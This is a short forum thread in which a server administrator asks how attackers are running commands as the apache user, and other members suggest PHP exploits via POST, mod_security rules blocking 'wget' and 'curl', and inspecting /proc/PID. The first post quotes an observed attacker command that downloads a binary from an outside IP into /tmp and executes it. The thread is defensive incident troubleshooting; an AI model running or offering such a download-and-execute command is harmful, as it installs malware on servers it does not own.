Results 1 to 4 of 4
  1. #1
    Join Date
    Feb 2004
    Posts
    1,226

    executing commands as apache

    hello

    I run PHP as module on my apache, and sometimes I find things like that on my "ps -auxw | grep apache":
    sh -c cd /tmp;wget http://222.235.73.39/http;chmod +x http;./http
    the problem is:
    1) it's probably not runned by a PHP script (since it wouldn't open a new process for it)
    2) I grepd all the domain logs for the IP or hostname (when they use host) and didn't find anything
    3) I checked all ports binded by apache to check if they exploiter isn't running a shell and executing the commands thru it... nothing found

    so... how can these commands be executed by apache?
    which other ways they can make apache execute things?!

  2. #2
    Join Date
    Jun 2000
    Location
    Washington, USA
    Posts
    5,991
    They are likely being executed by a PHP script. The PHP script is spawning off a shell instance, to do it's bidding. As well, if the exploit is done via POST, not much will show up in the logs.

    I'd suggest installing mod_security, and tuning it to fit your needs. It'll really cut down on this sort of thing.

  3. #3
    Join Date
    Feb 2004
    Posts
    1,226
    Originally posted by JTY
    They are likely being executed by a PHP script. The PHP script is spawning off a shell instance, to do it's bidding. As well, if the exploit is done via POST, not much will show up in the logs.

    I'd suggest installing mod_security, and tuning it to fit your needs. It'll really cut down on this sort of thing.

    mod_security is already installed, but I've no idea on how they're doing this
    as far as I checked, they tried to bind the shell, but didn't get (/tmp has "no exec")
    any ideas on how to find if it was by POST?!

    may this vuln be exploited by POST? http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=302011

  4. #4
    Join Date
    Dec 2002
    Location
    Egypt
    Posts
    151
    You need to tighten your mod_security rules a bit to include 'wget' , 'curl' , ...etc

    when you see something like the above line , do the following

    cd /proc/PID

    there is much helpful info. in this directory like the command used , also FD (file disc.) which will contain all the files used by this command and sure from all these info you will know the buggy script that is causing this.

    Hope this helps.
    knowledge is Power , Spread it.
    www.e-tutankhamun.com
    [email protected]
    AIM:AhmedFouad0 , yahooID:xor2004

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •